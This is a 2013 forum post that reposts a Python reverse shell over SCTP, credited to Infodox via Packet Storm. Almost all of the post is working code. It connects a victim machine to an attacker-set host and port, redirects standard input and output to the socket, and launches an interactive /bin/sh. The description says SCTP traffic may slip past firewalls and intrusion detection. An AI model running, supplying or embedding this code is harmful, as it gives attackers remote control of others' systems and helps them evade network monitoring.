Matt Posted July 1, 2013 Report Posted July 1, 2013 Description : This is a reverse shell over SCTP implemented in Python. Currently it does not use SSL, but may evade most firewalls and IDS devices as many of them seemingly have no rules in place to check SCTP traffic.Author : InfodoxSource : SCTP Reverse Shell ? Packet StormCode : #!/usr/bin/python# SCTP Reverse Shell (TCP mode)# Requires pysctp and sctp to be working# on the victim box.# My perfect saturday... Involves ## infodox - Insecurety Research 2013# insecurety.net | @info_dox# I probably imported too much things. Who cares.import socketimport _sctpimport sctpfrom sctp import *import osimport subprocesshost = '127.0.0.1' # CHANGEMEport = 1337 # CHANGEMEsocket.setdefaulttimeout(60)s = Nonetry: s = sctpsocket_tcp(socket.AF_INET) s.connect((host,port)) s.send('g0tsh3ll!\n') save = [ os.dup(i) for i in range(0,3) ] os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) shell = subprocess.call(["/bin/sh","-i"]) [ os.dup2(save[i],i) for i in range(0,3)] [ os.close(save[i]) for i in range(0,3)] os.close(s.fileno())except Exception: print "Connection Failed! Is there even a listener?" pass Quote